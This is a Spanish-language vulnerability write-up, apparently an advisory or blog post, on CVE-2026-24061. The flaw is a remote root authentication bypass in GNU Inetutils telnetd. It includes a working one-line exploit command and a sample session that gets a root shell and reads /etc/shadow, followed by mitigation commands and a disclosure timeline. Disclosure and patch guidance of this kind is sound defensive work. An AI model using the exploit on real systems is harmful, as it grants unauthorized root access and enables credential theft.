
CVE-2026-24061
Bypass crítico de autenticación remota en GNU Inetutils telnetd
El fantasma de 2015 ha vuelto para apoderarse de todo lo que todavía ejecuta telnet.
Cero autenticación. Una variable de entorno. Shell root instantánea.
CVE-2026-24061 es una vulnerabilidad crítica de escalada de privilegios remota en GNU Inetutils telnetd ≤ 2.7.
Un atacante remoto no autenticado establece la variable de entorno USER a "-f root" mediante la opción NEW-ENVIRON de Telnet.
telnetd lo pasa sin sanitizar directamente a /bin/login → login ve -f root → omite toda la autenticación → deja al atacante en una shell root.
El código peligroso permaneció silencioso en el árbol durante casi 11 años (desde ~2015).
“Una variable de entorno. Sin contraseña. Root completo. Bienvenidos a 2026.”
Realidad en marzo de 2026:
Cuando telnetd recibe una opción NEW-ENVIRON que contiene:
USER=-f root
Añade el valor directamente al argv pasado a /bin/login:
execve("/bin/login", ["login", "-f", "root", ...], ...)
El binario login interpreta -f root como:
“este usuario ya está autenticado como root — no se necesita comprobar la contraseña”.
→ El atacante obtiene el prompt #. Fin del juego.
Decisión de diseño fatal clave: el reenvío de -R / variables de entorno nunca se restringió a usuarios autorizados.
Versiones vulnerables: GNU Inetutils telnetd 1.9.3 – 2.7
Objetivos comunes en 2026:
Seguros:
Una sola línea (cualquier Linux/macOS con cliente telnet):
USER="-f root" telnet -a 192.168.1.50
Salida típica:
┌──(attacker㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.
Debian GNU/Linux 12 telnetd
root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...
Una pulsación de la tecla Enter después: acceso root completo.
telnet localhost 23 # look for inetutils banner
inetutils-telnetd --version # vulnerable if ≤ 2.7
systemctl disable --now inetutils-inetd # or telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd
sudo apt update && sudo apt install --reinstall inetutils-telnetd # → ≥2.8
iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp
| Fecha | Evento |
|---|
| ~Marzo de 2015 | Se introdujo el manejo vulnerable de variables de entorno |
| Enero de 2026 | Informe privado a upstream |
| Finales de enero de 2026 | Divulgación pública y asignación del CVE |
| Finales de enero de 2026 | Corrección publicada (Inetutils ≥ 2.8) |
| 26 de enero de 2026 | Añadida al catálogo de Vulnerabilidades Explotadas Conocidas de CISA |
| Febrero–Marzo de 2026 | Picos de explotación contra sistemas heredados/OT |
| Marzo de 2026 | Muchos fabricantes de embebidos siguen en silencio o sin parchear |